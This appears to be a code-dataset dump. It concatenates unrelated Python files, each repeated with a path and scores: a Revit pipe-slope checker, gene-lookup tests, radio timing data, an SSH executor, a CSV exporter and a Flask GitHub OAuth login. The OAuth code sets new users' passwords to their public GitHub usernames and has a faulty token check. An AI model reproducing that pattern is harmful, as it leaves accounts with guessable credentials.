return abs(a-b) >= max(rel_tol * max(abs(a), abs(b)), abs_tol)
sel_element = Selection.get_selected_elements(doc)
if len(sel_element) == 0:
TaskDialog.Show('Warning', 'Please make selection first')
else:
outprint = script.get_output()
pipes = []
for i in sel_element:
if i.Category.Name == 'Pipes':
pipes.append(i)
print('Found ' + str(len(pipes)) + ' pipes')
# pipes = FilteredElementCollector(doc).OfClass(Pipe).ToElements()
for p in pipes:
slope = p.LookupParameter('Slope').AsDouble()
if slope != 0.0 and slope < 1.1 and isnotclose(slope, 12/12)and isnotclose(slope, 0.5/12) and isnotclose(slope, 0.25/12)\
and isnotclose(slope, 0.125/12) and isnotclose(slope, 0.0625/12):
print(format(outprint.linkify(p.Id))+ ' SLOPE: ' + str(slope*12) + '/foot')
print('End') | 0.217421 | 0.092074 |
from find_gene import find_gene
from batch_find_gene import batch_find_gene
from find_homologues import find_homologues
from find_ipg import find_ipg
from choose_gene import choose_gene
def test_find_gene():
"""
test_early_find_gene should return the matching DNA accession
number (M22259.1) of protein AAA34866.
"""
expect_gene = find_gene("AAA34866")
assert expect_gene == ["DNA AN: M22259.1"]
def test_batch_find_gene():
"""
test_batch_find_gene should return both gene's corresponding DNA accession
numbers.
"""
expect_batch = batch_find_gene(["AAA34866", "GAX67478"])
assert expect_batch == ['M22259.1', 'BEGW01000001.1']
def test_find_ipg():
"""
test_find_ipg should return the identical proteins of both proteins
provided. GenBank may update, possibly leading to different identical
protein results.
"""
expect_ipg = find_ipg(["AAA34866", "GAX67478"], ipgfilename="testipg.csv")
assert expect_ipg == {'M22259.1': ('387', '2066', 1),
'NC_001136.10': ('270222', '271901', 2),
'NM_001180165.1': ('1', '1680', 1),
'X05062.1': ('391', '2070', 1),
'X95644.1': ('8447', '10126', 2),
'Z74154.1': ('246', '1925', 2),
'BK006938.2': ('270222', '271901', 2),
'CM004297.1': ('288824', '290503', 2),
'LBMA01000004.1': ('288824', '290503', 2),
'HB870545.1': ('387', '2066', 1),
'HC927954.1': ('387', '2066', 1),
'BEGW01000001.1': ('1223469', '1225145', 1),
'CP004724.2': ('264356', '266032', 2),
'CP004740.2': ('253800', '255476', 2),
'CP004750.2': ('264165', '265841', 2),
'DG000040.1': ('258839', '260515', 2)}
def test_find_homologues():
"""
test_find_homologues should return only the 3 results, as specified.
GenBank may update, possibly leading to different BLAST results.
"""
expect_blast1 = find_homologues("AAA34866",max_number=3,
filename="testblast.xml")
assert expect_blast1 == ['NP_010177', 'AJU66839', 'AJU64042']
def test_choose_gene():
"""
test_choose_gene should return the DNA accession numbers, codon adaptation
indexes, start positions and stop positions of the corresponding first two
proteins in testipg.csv with available DNA accession numbers.
"""
expect_CAI = choose_gene("sharp_yeast.txt",ipgfile="testipg.csv")
assert expect_CAI == {'AAA34866.1': ('M22259.1', 0.148, '387', '2066'),
'NP_010177.1': ('NM_001180165.1', 0.148, '1', '1680')} | test_all.py | from find_gene import find_gene
from batch_find_gene import batch_find_gene
from find_homologues import find_homologues
from find_ipg import find_ipg
from choose_gene import choose_gene
def test_find_gene():
"""
test_early_find_gene should return the matching DNA accession
number (M22259.1) of protein AAA34866.
"""
expect_gene = find_gene("AAA34866")
assert expect_gene == ["DNA AN: M22259.1"]
def test_batch_find_gene():
"""
test_batch_find_gene should return both gene's corresponding DNA accession
numbers.
"""
expect_batch = batch_find_gene(["AAA34866", "GAX67478"])
assert expect_batch == ['M22259.1', 'BEGW01000001.1']
def test_find_ipg():
"""
test_find_ipg should return the identical proteins of both proteins
provided. GenBank may update, possibly leading to different identical
protein results.
"""
expect_ipg = find_ipg(["AAA34866", "GAX67478"], ipgfilename="testipg.csv")
assert expect_ipg == {'M22259.1': ('387', '2066', 1),
'NC_001136.10': ('270222', '271901', 2),
'NM_001180165.1': ('1', '1680', 1),
'X05062.1': ('391', '2070', 1),
'X95644.1': ('8447', '10126', 2),
'Z74154.1': ('246', '1925', 2),
'BK006938.2': ('270222', '271901', 2),
'CM004297.1': ('288824', '290503', 2),
'LBMA01000004.1': ('288824', '290503', 2),
'HB870545.1': ('387', '2066', 1),
'HC927954.1': ('387', '2066', 1),
'BEGW01000001.1': ('1223469', '1225145', 1),
'CP004724.2': ('264356', '266032', 2),
'CP004740.2': ('253800', '255476', 2),
'CP004750.2': ('264165', '265841', 2),
'DG000040.1': ('258839', '260515', 2)}
def test_find_homologues():
"""
test_find_homologues should return only the 3 results, as specified.
GenBank may update, possibly leading to different BLAST results.
"""
expect_blast1 = find_homologues("AAA34866",max_number=3,
filename="testblast.xml")
assert expect_blast1 == ['NP_010177', 'AJU66839', 'AJU64042']
def test_choose_gene():
"""
test_choose_gene should return the DNA accession numbers, codon adaptation
indexes, start positions and stop positions of the corresponding first two
proteins in testipg.csv with available DNA accession numbers.
"""
expect_CAI = choose_gene("sharp_yeast.txt",ipgfile="testipg.csv")
assert expect_CAI == {'AAA34866.1': ('M22259.1', 0.148, '387', '2066'),
'NP_010177.1': ('NM_001180165.1', 0.148, '1', '1680')} | 0.703957 | 0.541106 |
def_numtx = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
def_scheduleTimes = [152, 277, 404, 537, 663, 789, 915, 1050, 1173, 1300, 1433, 1560, 1686, 1812, 1946, 2071, 2197, 2330, 2457, 2583, 2709, 2843, 2968, 3093, 3227, 3354, 3480, 3607, 3740, 3865, 3990, 4124, 4250, 4377, 4503, 4637, 4762, 4887, 5021, 5147, 5274, 5400, 5534, 5659, 5784, 5919, 6044, 6170, 6296, 6431, 6555, 6681, 6815, 6941, 7068, 7194, 7328, 7452, 7578, 7711]
def_sendTimes = [153, 279, 404, 540, 665, 790, 925, 1050, 1176, 1301, 1436, 1561, 1687, 1821, 1948, 2073, 2198, 2333, 2458, 2584, 2718, 2844, 2969, 3095, 3230, 3355, 3481, 3615, 3741, 3866, 3992, 4126, 4252, 4388, 4512, 4638, 4763, 4889, 5023, 5149, 5274, 5409, 5535, 5660, 5795, 5920, 6056, 6180, 6306, 6431, 6557, 6683, 6817, 6944, 7068, 7203, 7328, 7454, 7579, 7714]
def_cpu_time_leaf = 44656
def_cpu_sleep_time_leaf = 103719
def_cpu_deepsleep_time_leaf = 1823782
def_radio_rx_time_leaf = 6916
def_radio_tx_time_leaf = 73812
high_numtx = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
high_scheduleTimes = [7892, 8018, 8144, 8278, 8403, 8530, 8662, 8789, 8916, 9041, 9175, 9300, 9426, 9559, 9685, 9812, 9938, 10072, 10197, 10323, 10457, 10582, 10709, 10834, 10970, 11094, 11220, 11353, 11480, 11606, 11731, 11866, 11990, 12117, 12250, 12376, 12503, 12628, 12763, 12887, 13014, 13146, 13273, 13400, 13525, 13660, 13784, 13911, 14043, 14170, 14296, 14422, 14557, 14681, 14808, 14940, 15067, 15193, 15319, 15453]
high_sendTimes = [7894, 8019, 8153, 8279, 8405, 8530, 8666, 8790, 8916, 9050, 9176, 9301, 9427, 9562, 9687, 9813, 9947, 10073, 10198, 10324, 10459, 10584, 10709, 10844, 10970, 11095, 11221, 11356, 11482, 11606, 11741, 11875, 11993, 12118, 12253, 12378, 12503, 12638, 12763, 12889, 13014, 13150, 13275, 13400, 13535, 13660, 13787, 13911, 14047, 14171, 14297, 14432, 14557, 14683, 14808, 14944, 15068, 15194, 15328, 15454]
high_cpu_time_leaf = 42449
high_cpu_sleep_time_leaf = 104919
high_cpu_deepsleep_time_leaf = 1823652
high_radio_rx_time_leaf = 6448
high_radio_tx_time_leaf = 73701
low_numtx = [1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 2]
low_scheduleTimes = [15614, 15739, 15866, 16000, 16126, 16251, 16377, 16511, 16636, 16763, 16896, 17023, 17147, 17274, 17407, 17533, 17660, 17794, 17920, 18044, 18171, 18304, 18430, 18557, 18690, 18817, 18941, 19068, 19201, 19327, 19452, 19587, 19714, 19838, 19965, 20098, 20224, 20350, 20484, 20610, 20735, 20862, 20995, 21121, 21247, 21381, 21507, 21632, 21759, 21891, 22018, 22144, 22278, 22404, 22529, 22655, 22789, 22914, 23041, 23175]
low_sendTimes = [15616, 15741, 15867, 16011, 16127, 16252, 16387, 16512, 16638, 16763, 16899, 17023, 17159, 17293, 17409, 17536, 17660, 17796, 17920, 18046, 18180, 18306, 18432, 18557, 18693, 18817, 18943, 19077, 19203, 19338, 19454, 19590, 19714, 19840, 19974, 20100, 20225, 20351, 20486, 20611, 20737, 20871, 20997, 21122, 21248, 21383, 21508, 21633, 21768, 21894, 22019, 22155, 22279, 22405, 22530, 22665, 22790, 22916, 23042, 23186]
low_cpu_time_leaf = 42164
low_cpu_sleep_time_leaf = 105028
low_cpu_deepsleep_time_leaf = 1825274
low_radio_rx_time_leaf = 7124
low_radio_tx_time_leaf = 74142
def_cpu_time_coordinator = 32136
def_cpu_sleep_time_coordinator = 177725
def_cpu_deepsleep_time_coordinator = 1764911
def_radio_rx_time_coordinator = 2221
def_radio_tx_time_coordinator = 142952
high_cpu_time_coordinator = 29412
high_cpu_sleep_time_coordinator = 177696
high_cpu_deepsleep_time_coordinator = 1765509
high_radio_rx_time_coordinator = 2221
high_radio_tx_time_coordinator = 141609
low_cpu_time_coordinator = 29029
low_cpu_sleep_time_coordinator = 179667
low_cpu_deepsleep_time_coordinator = 1766504
low_radio_rx_time_coordinator = 2273
low_radio_tx_time_coordinator = 142209 | examples/task3/plotting/data/data10m.py | def_numtx = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
def_scheduleTimes = [152, 277, 404, 537, 663, 789, 915, 1050, 1173, 1300, 1433, 1560, 1686, 1812, 1946, 2071, 2197, 2330, 2457, 2583, 2709, 2843, 2968, 3093, 3227, 3354, 3480, 3607, 3740, 3865, 3990, 4124, 4250, 4377, 4503, 4637, 4762, 4887, 5021, 5147, 5274, 5400, 5534, 5659, 5784, 5919, 6044, 6170, 6296, 6431, 6555, 6681, 6815, 6941, 7068, 7194, 7328, 7452, 7578, 7711]
def_sendTimes = [153, 279, 404, 540, 665, 790, 925, 1050, 1176, 1301, 1436, 1561, 1687, 1821, 1948, 2073, 2198, 2333, 2458, 2584, 2718, 2844, 2969, 3095, 3230, 3355, 3481, 3615, 3741, 3866, 3992, 4126, 4252, 4388, 4512, 4638, 4763, 4889, 5023, 5149, 5274, 5409, 5535, 5660, 5795, 5920, 6056, 6180, 6306, 6431, 6557, 6683, 6817, 6944, 7068, 7203, 7328, 7454, 7579, 7714]
def_cpu_time_leaf = 44656
def_cpu_sleep_time_leaf = 103719
def_cpu_deepsleep_time_leaf = 1823782
def_radio_rx_time_leaf = 6916
def_radio_tx_time_leaf = 73812
high_numtx = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
high_scheduleTimes = [7892, 8018, 8144, 8278, 8403, 8530, 8662, 8789, 8916, 9041, 9175, 9300, 9426, 9559, 9685, 9812, 9938, 10072, 10197, 10323, 10457, 10582, 10709, 10834, 10970, 11094, 11220, 11353, 11480, 11606, 11731, 11866, 11990, 12117, 12250, 12376, 12503, 12628, 12763, 12887, 13014, 13146, 13273, 13400, 13525, 13660, 13784, 13911, 14043, 14170, 14296, 14422, 14557, 14681, 14808, 14940, 15067, 15193, 15319, 15453]
high_sendTimes = [7894, 8019, 8153, 8279, 8405, 8530, 8666, 8790, 8916, 9050, 9176, 9301, 9427, 9562, 9687, 9813, 9947, 10073, 10198, 10324, 10459, 10584, 10709, 10844, 10970, 11095, 11221, 11356, 11482, 11606, 11741, 11875, 11993, 12118, 12253, 12378, 12503, 12638, 12763, 12889, 13014, 13150, 13275, 13400, 13535, 13660, 13787, 13911, 14047, 14171, 14297, 14432, 14557, 14683, 14808, 14944, 15068, 15194, 15328, 15454]
high_cpu_time_leaf = 42449
high_cpu_sleep_time_leaf = 104919
high_cpu_deepsleep_time_leaf = 1823652
high_radio_rx_time_leaf = 6448
high_radio_tx_time_leaf = 73701
low_numtx = [1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 2]
low_scheduleTimes = [15614, 15739, 15866, 16000, 16126, 16251, 16377, 16511, 16636, 16763, 16896, 17023, 17147, 17274, 17407, 17533, 17660, 17794, 17920, 18044, 18171, 18304, 18430, 18557, 18690, 18817, 18941, 19068, 19201, 19327, 19452, 19587, 19714, 19838, 19965, 20098, 20224, 20350, 20484, 20610, 20735, 20862, 20995, 21121, 21247, 21381, 21507, 21632, 21759, 21891, 22018, 22144, 22278, 22404, 22529, 22655, 22789, 22914, 23041, 23175]
low_sendTimes = [15616, 15741, 15867, 16011, 16127, 16252, 16387, 16512, 16638, 16763, 16899, 17023, 17159, 17293, 17409, 17536, 17660, 17796, 17920, 18046, 18180, 18306, 18432, 18557, 18693, 18817, 18943, 19077, 19203, 19338, 19454, 19590, 19714, 19840, 19974, 20100, 20225, 20351, 20486, 20611, 20737, 20871, 20997, 21122, 21248, 21383, 21508, 21633, 21768, 21894, 22019, 22155, 22279, 22405, 22530, 22665, 22790, 22916, 23042, 23186]
low_cpu_time_leaf = 42164
low_cpu_sleep_time_leaf = 105028
low_cpu_deepsleep_time_leaf = 1825274
low_radio_rx_time_leaf = 7124
low_radio_tx_time_leaf = 74142
def_cpu_time_coordinator = 32136
def_cpu_sleep_time_coordinator = 177725
def_cpu_deepsleep_time_coordinator = 1764911
def_radio_rx_time_coordinator = 2221
def_radio_tx_time_coordinator = 142952
high_cpu_time_coordinator = 29412
high_cpu_sleep_time_coordinator = 177696
high_cpu_deepsleep_time_coordinator = 1765509
high_radio_rx_time_coordinator = 2221
high_radio_tx_time_coordinator = 141609
low_cpu_time_coordinator = 29029
low_cpu_sleep_time_coordinator = 179667
low_cpu_deepsleep_time_coordinator = 1766504
low_radio_rx_time_coordinator = 2273
low_radio_tx_time_coordinator = 142209 | 0.156427 | 0.507507 |
from ...configuration.utilities import enable_yaml_load
from ...exceptions.executorexceptions import CommandExecutionFailure
from ...interfaces.executor import Executor
from ..attributedict import AttributeDict
import asyncio
import asyncssh
@enable_yaml_load("!SSHExecutor")
class SSHExecutor(Executor):
def __init__(self, **parameters):
self._parameters = parameters
self._ssh_connection = None
self._lock = None
async def _establish_connection(self):
for retry in range(1, 10):
try:
return await asyncssh.connect(**self._parameters)
except (
ConnectionResetError,
asyncssh.DisconnectError,
asyncssh.ConnectionLost,
BrokenPipeError,
):
await asyncio.sleep(retry * 10)
return await asyncssh.connect(**self._parameters)
@property
async def ssh_connection(self):
if self._ssh_connection is None:
async with self.lock:
# check that connection has not yet been initialize in a different task
while self._ssh_connection is None:
self._ssh_connection = await self._establish_connection()
return self._ssh_connection
@property
def lock(self):
# Create lock once tardis event loop is running.
# To avoid got Future <Future pending> attached to a different loop exception
if self._lock is None:
self._lock = asyncio.Lock()
return self._lock
async def run_command(self, command, stdin_input=None):
ssh_connection = await self.ssh_connection
try:
response = await ssh_connection.run(
command, check=True, input=stdin_input and stdin_input.encode()
)
except asyncssh.ProcessError as pe:
raise CommandExecutionFailure(
message=f"Run command {command} via SSHExecutor failed",
exit_code=pe.exit_status,
stdin=stdin_input,
stdout=pe.stdout,
stderr=pe.stderr,
) from pe
except asyncssh.ChannelOpenError as coe:
# Broken connection will be replaced by a new connection during next call
self._ssh_connection = None
raise CommandExecutionFailure(
message=f"Could not run command {command} due to SSH failure: {coe}",
exit_code=255,
stdout="",
stderr="SSH Broken Connection",
) from coe
else:
return AttributeDict(
stdout=response.stdout,
stderr=response.stderr,
exit_code=response.exit_status,
) | tardis/utilities/executors/sshexecutor.py | from ...configuration.utilities import enable_yaml_load
from ...exceptions.executorexceptions import CommandExecutionFailure
from ...interfaces.executor import Executor
from ..attributedict import AttributeDict
import asyncio
import asyncssh
@enable_yaml_load("!SSHExecutor")
class SSHExecutor(Executor):
def __init__(self, **parameters):
self._parameters = parameters
self._ssh_connection = None
self._lock = None
async def _establish_connection(self):
for retry in range(1, 10):
try:
return await asyncssh.connect(**self._parameters)
except (
ConnectionResetError,
asyncssh.DisconnectError,
asyncssh.ConnectionLost,
BrokenPipeError,
):
await asyncio.sleep(retry * 10)
return await asyncssh.connect(**self._parameters)
@property
async def ssh_connection(self):
if self._ssh_connection is None:
async with self.lock:
# check that connection has not yet been initialize in a different task
while self._ssh_connection is None:
self._ssh_connection = await self._establish_connection()
return self._ssh_connection
@property
def lock(self):
# Create lock once tardis event loop is running.
# To avoid got Future <Future pending> attached to a different loop exception
if self._lock is None:
self._lock = asyncio.Lock()
return self._lock
async def run_command(self, command, stdin_input=None):
ssh_connection = await self.ssh_connection
try:
response = await ssh_connection.run(
command, check=True, input=stdin_input and stdin_input.encode()
)
except asyncssh.ProcessError as pe:
raise CommandExecutionFailure(
message=f"Run command {command} via SSHExecutor failed",
exit_code=pe.exit_status,
stdin=stdin_input,
stdout=pe.stdout,
stderr=pe.stderr,
) from pe
except asyncssh.ChannelOpenError as coe:
# Broken connection will be replaced by a new connection during next call
self._ssh_connection = None
raise CommandExecutionFailure(
message=f"Could not run command {command} due to SSH failure: {coe}",
exit_code=255,
stdout="",
stderr="SSH Broken Connection",
) from coe
else:
return AttributeDict(
stdout=response.stdout,
stderr=response.stderr,
exit_code=response.exit_status,
) | 0.558327 | 0.098079 |
import csv
import pandas as pd
from src.filepaths import getFilePathOutput
def exportInputData(params: dict):
rows = []
for paramKey, paramData in params.items():
source = paramData['source'] if 'source' in paramData else ''
rows.extend(__printScenarioValue(paramData['desc'], paramData['unit'], source, paramData['value']))
__writeToFile(rows, 'table_scenario_params.csv')
def __printScenarioValue(name, unit, source, value):
if isinstance(value, dict) and isinstance(list(value.keys())[0], str):
r = []
for key, val in value.items():
r.extend(__printScenarioValue(f"{name} {key}", unit, source, val))
return r
elif isinstance(value, dict):
return [(name, unit, '{0}: {1}'.format(*list(value.items())[0]), '{0}: {1}'.format(*list(value.items())[-1]), source)]
else:
return [(name, unit, f"2025: {value}", f"2050: {value}", source)]
def exportFullParams(full_params: pd.DataFrame):
yearInit = 2025
yearFinal = 2050
fullParamsInit = full_params.query(f"year == {yearInit}").drop(columns=['year'])
fullParamsFinal = full_params.query(f"year == {yearFinal}").drop(columns=['year'])
fullParamInitFinal = fullParamsInit.merge(fullParamsFinal, on=['name', 'unit'], how='outer', suffixes=('_init', '_final'))
params = []
for index, row in fullParamInitFinal.iterrows():
vi = __printValueFull(row['value_init'], row['uncertainty_init'], row['uncertainty_lower_init'])
vf = __printValueFull(row['value_final'], row['uncertainty_final'], row['uncertainty_lower_final'])
params.append((row['name'], row['unit'], vi, vf))
__writeToFile(params, 'table_full_params.csv')
def __printValueFull(val, uu, ul):
if uu is None:
return f"{val}\t"
elif ul is None:
return f"{val} +- {uu}\t"
else:
return f"{val} + {uu} - {ul}\t"
def __writeToFile(params: list, fname: str):
filePath = getFilePathOutput(fname)
with open(filePath, 'w') as csvFile:
spamwriter = csv.writer(csvFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
spamwriter.writerows(params) | src/data/params/export_params.py | import csv
import pandas as pd
from src.filepaths import getFilePathOutput
def exportInputData(params: dict):
rows = []
for paramKey, paramData in params.items():
source = paramData['source'] if 'source' in paramData else ''
rows.extend(__printScenarioValue(paramData['desc'], paramData['unit'], source, paramData['value']))
__writeToFile(rows, 'table_scenario_params.csv')
def __printScenarioValue(name, unit, source, value):
if isinstance(value, dict) and isinstance(list(value.keys())[0], str):
r = []
for key, val in value.items():
r.extend(__printScenarioValue(f"{name} {key}", unit, source, val))
return r
elif isinstance(value, dict):
return [(name, unit, '{0}: {1}'.format(*list(value.items())[0]), '{0}: {1}'.format(*list(value.items())[-1]), source)]
else:
return [(name, unit, f"2025: {value}", f"2050: {value}", source)]
def exportFullParams(full_params: pd.DataFrame):
yearInit = 2025
yearFinal = 2050
fullParamsInit = full_params.query(f"year == {yearInit}").drop(columns=['year'])
fullParamsFinal = full_params.query(f"year == {yearFinal}").drop(columns=['year'])
fullParamInitFinal = fullParamsInit.merge(fullParamsFinal, on=['name', 'unit'], how='outer', suffixes=('_init', '_final'))
params = []
for index, row in fullParamInitFinal.iterrows():
vi = __printValueFull(row['value_init'], row['uncertainty_init'], row['uncertainty_lower_init'])
vf = __printValueFull(row['value_final'], row['uncertainty_final'], row['uncertainty_lower_final'])
params.append((row['name'], row['unit'], vi, vf))
__writeToFile(params, 'table_full_params.csv')
def __printValueFull(val, uu, ul):
if uu is None:
return f"{val}\t"
elif ul is None:
return f"{val} +- {uu}\t"
else:
return f"{val} + {uu} - {ul}\t"
def __writeToFile(params: list, fname: str):
filePath = getFilePathOutput(fname)
with open(filePath, 'w') as csvFile:
spamwriter = csv.writer(csvFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
spamwriter.writerows(params) | 0.326271 | 0.229827 |
import os
import time
from datetime import datetime
import requests
from flask import Blueprint, jsonify, json, current_app
from flask_login import current_user, login_user
from jaysblog import User, db
from jaysblog.utils.response_code import RET
oauth_bp = Blueprint('oauth_blueprint', __name__)
name = 'github',
consumer_key = os.getenv('GITHUB_CLIENT_ID'),
consumer_secret = os.getenv('GITHUB_CLIENT_SECRET'),
request_token_params = {'scope': 'user'},
base_url = 'https://api.github.com/',
request_token_url = None,
access_token_method = 'POST',
access_token_url = 'https://github.com/login/oauth/access_token',
authorize_url = 'https://github.com/login/oauth/authorize',
user_url = 'https://api.github.com/user',
@oauth_bp.route('/login/<code>')
def oauth_login(code):
if code is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='参数错误或缺失')
if current_user.is_authenticated:
if current_user.is_admin is True:
currentAuthority = 'admin'
else:
currentAuthority = 'user'
return jsonify(code=RET.OK, msg='当前用户已通过认证', currentAuthority=currentAuthority, type='account',
user_id=current_user.id)
return oauth_callback(code)
def oauth_callback(code):
if code is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='参数错误或缺失')
data = {
'client_id': consumer_key,
'client_secret': consumer_secret,
'code': code,
}
access_token_params = requests.post(url=access_token_url[0], data=data)
if access_token_params.status_code == 200:
text = access_token_params.text
if 'access_token' and 'scope' in text:
args = text.split('&')[0]
access_token = args.split('=')[1]
return get_oauth_user_messages(access_token)
else:
return jsonify(code=RET.USER_OAUTH_ERROR, msg='第三方认证信息过期,请稍后再试')
else:
return jsonify(code=RET.USER_OAUTH_ERROR, msg='获取第三方认证信息错误,请稍后再试')
def get_oauth_user_messages(access_token):
if access_token is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='参数错误或缺失')
params = {
'access_token': access_token
}
user_messages = requests.get(user_url[0], params)
user_text = user_messages.text
user_json = json.loads(user_text)
try:
user = User.query.filter(User.id == user_json['id']).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_SELECT_ERROR, msg='查询数据库数据错误')
if user:
login_user(user, remember=True)
if user.nick_name != user_json['login']:
user.nick_name = user_json['login']
user.email = user_json['email'] if user_json['email'] else user_json['html_url']
user.last_login_time = datetime.utcnow()
try:
db.session.commit()
except Exception as e:
db.session.rollback()
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='提交用户信息到数据库失败')
else:
user = User()
try:
user_check = User.query.filter_by(nick_name=user_json['login']).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='查询数据库数据错误')
if user_check:
user.nick_name = user_json['login'] + str(time.time()).split('.')[1]
else:
user.nick_name = user_json['login']
user.id = user_json['id']
user.email = user_json['email'] if user_json['email'] else user_json['html_url']
user.avatar_url = user_json['avatar_url']
user.nick_name = user_json['login']
user.password = user_json['login']
user.desc = user_json['bio']
user.location = user_json['location']
user.last_login_time = datetime.utcnow()
try:
db.session.add(user)
db.session.commit()
login_user(user, remember=True)
except Exception as e:
db.session.rollback()
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='提交用户信息到数据库失败')
return jsonify(code=RET.OK, msg='第三方授权登陆成功') | jaysblog/blueprints/oauth/oauth_blueprint.py | import os
import time
from datetime import datetime
import requests
from flask import Blueprint, jsonify, json, current_app
from flask_login import current_user, login_user
from jaysblog import User, db
from jaysblog.utils.response_code import RET
oauth_bp = Blueprint('oauth_blueprint', __name__)
name = 'github',
consumer_key = os.getenv('GITHUB_CLIENT_ID'),
consumer_secret = os.getenv('GITHUB_CLIENT_SECRET'),
request_token_params = {'scope': 'user'},
base_url = 'https://api.github.com/',
request_token_url = None,
access_token_method = 'POST',
access_token_url = 'https://github.com/login/oauth/access_token',
authorize_url = 'https://github.com/login/oauth/authorize',
user_url = 'https://api.github.com/user',
@oauth_bp.route('/login/<code>')
def oauth_login(code):
if code is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='参数错误或缺失')
if current_user.is_authenticated:
if current_user.is_admin is True:
currentAuthority = 'admin'
else:
currentAuthority = 'user'
return jsonify(code=RET.OK, msg='当前用户已通过认证', currentAuthority=currentAuthority, type='account',
user_id=current_user.id)
return oauth_callback(code)
def oauth_callback(code):
if code is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='参数错误或缺失')
data = {
'client_id': consumer_key,
'client_secret': consumer_secret,
'code': code,
}
access_token_params = requests.post(url=access_token_url[0], data=data)
if access_token_params.status_code == 200:
text = access_token_params.text
if 'access_token' and 'scope' in text:
args = text.split('&')[0]
access_token = args.split('=')[1]
return get_oauth_user_messages(access_token)
else:
return jsonify(code=RET.USER_OAUTH_ERROR, msg='第三方认证信息过期,请稍后再试')
else:
return jsonify(code=RET.USER_OAUTH_ERROR, msg='获取第三方认证信息错误,请稍后再试')
def get_oauth_user_messages(access_token):
if access_token is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='参数错误或缺失')
params = {
'access_token': access_token
}
user_messages = requests.get(user_url[0], params)
user_text = user_messages.text
user_json = json.loads(user_text)
try:
user = User.query.filter(User.id == user_json['id']).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_SELECT_ERROR, msg='查询数据库数据错误')
if user:
login_user(user, remember=True)
if user.nick_name != user_json['login']:
user.nick_name = user_json['login']
user.email = user_json['email'] if user_json['email'] else user_json['html_url']
user.last_login_time = datetime.utcnow()
try:
db.session.commit()
except Exception as e:
db.session.rollback()
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='提交用户信息到数据库失败')
else:
user = User()
try:
user_check = User.query.filter_by(nick_name=user_json['login']).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='查询数据库数据错误')
if user_check:
user.nick_name = user_json['login'] + str(time.time()).split('.')[1]
else:
user.nick_name = user_json['login']
user.id = user_json['id']
user.email = user_json['email'] if user_json['email'] else user_json['html_url']
user.avatar_url = user_json['avatar_url']
user.nick_name = user_json['login']
user.password = user_json['login']
user.desc = user_json['bio']
user.location = user_json['location']
user.last_login_time = datetime.utcnow()
try:
db.session.add(user)
db.session.commit()
login_user(user, remember=True)
except Exception as e:
db.session.rollback()
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='提交用户信息到数据库失败')
return jsonify(code=RET.OK, msg='第三方授权登陆成功') | 0.172137 | 0.053725 |
from environments import SerialTwoDOFGym
from visualservoing.state_extractory import StateExtractor
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import torch
import glob
#HELPER FUNCTION
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def check_pos_definite(A):
eigs = np.linalg.eigvals(A)
return (eigs > 0).all()
#GET DATA
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
visualize = "2-dof-inversejacobian"
#visualize="blackbox-kinematics-custom"
#visualize="global-neuralnetwork-multitask-custom"
directories = glob.glob('.experiments/kinova-2d-planar_analysis_take2/{}/*/result*.pth'.format(visualize))
#load each
results = {}
seed = 0
is_one_model = False
for pth in directories:
dt = pth.split('/')[-1].split('-dt-')[-1].split('-')[0]
